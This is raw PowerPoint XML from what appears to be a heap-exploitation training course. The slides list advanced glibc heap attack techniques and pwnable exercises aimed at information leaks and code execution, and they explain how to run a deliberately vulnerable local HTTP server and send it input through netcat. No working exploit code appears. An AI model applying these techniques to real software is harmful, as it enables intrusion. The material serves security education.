        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Want to Test Your New </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Skillz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AC90FE5-6544-47C7-A69C-365AC436DC9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extra Things To Do: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More vulnerabilities in HTTP Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/House of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Muney</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>House of Storm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>House of Spirit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwnables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find the vulnerability </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit vuln for information leak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit vuln for code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can try this in stages via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>grab </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>command </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8289150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3D92C-4B78-114A-90EC-AEA81551D31B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Next?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="What's Next Coaching - Home | Facebook">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AED01BCF-DA2F-9A4B-B2B9-7374F8C61F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650" y="1545522"/>
            <a:ext cx="3886200" cy="2910898"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D30E1401-C635-FB4D-AAEA-E67AC7C58474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4629150" y="1369219"/>
            <a:ext cx="3886200" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More Techniques (30+): </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>House of Force</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>House of Spirit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unsorted Bin Attack  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read the Malloc Source code (I’m serious) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pwnable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Real world exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1721811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F2AF-04FA-A34A-A2B4-196E0277D687}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This is the End!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Kid Cudi - Man On The Moon II: The Legend Of Mr. Rager - Amazon.com Music">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B66B8803-3511-854C-87F8-1C1788DD32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023"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="628650" y="1369219"/>
            <a:ext cx="3886200" cy="3263504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{356120E3-3173-4B03-8F91-EB26E21C92C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4629150" y="1369219"/>
            <a:ext cx="4419434" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instructors: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Maxwell Dulin - @dooflin5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zach </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Minneker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>seiranib</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349617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4C90-DDEC-754E-A2D9-3EE80F9C49FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List of Other Supported Things</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{894852FC-4C57-3D4D-A1D8-DB47AC393E64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Types: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>plain/text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All HTTP Verbs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Query parameters in URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL decoding in path/body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Renders in browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>🔥</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96343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4C90-DDEC-754E-A2D9-3EE80F9C49FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List of Non-Supported Things</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{894852FC-4C57-3D4D-A1D8-DB47AC393E64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1369219"/>
            <a:ext cx="3886200" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JSON and other Content Types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Complicated authorization headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anything else not mentioned before…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="No patrick Internet explorer is not supported - no patrick mayonnaise is not  an instrument | Meme Generator">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB1FAD5E-0D22-9F47-A336-B9F8EF9DD9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40498" y="1369219"/>
            <a:ext cx="3263504" cy="3263504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409592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5626-9164-5D40-BAA6-C47DA800BFE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start the Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAE1F3BD-F228-9046-9DC2-741CA060EED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1236541"/>
            <a:ext cx="8515350" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./server # Start the server &lt;-- In /final/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ./server # Works for debugging &lt;-- use this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP server on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>127.0.0.1 8081</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0">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122682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5626-9164-5D40-BAA6-C47DA800BFE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="0"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interact with the Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAE1F3BD-F228-9046-9DC2-741CA060EED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="131501" y="939998"/>
            <a:ext cx="7886700" cy="3929656"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write simply Python </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to print a string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pipe data to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> works as </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http_test.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 127.0.0.1 8081</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Python code for HTTP request - raw">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2F11838-1690-8C49-AD3A-D7FC4361FA15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3221521" y="939998"/>
            <a:ext cx="5984623" cy="3263504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
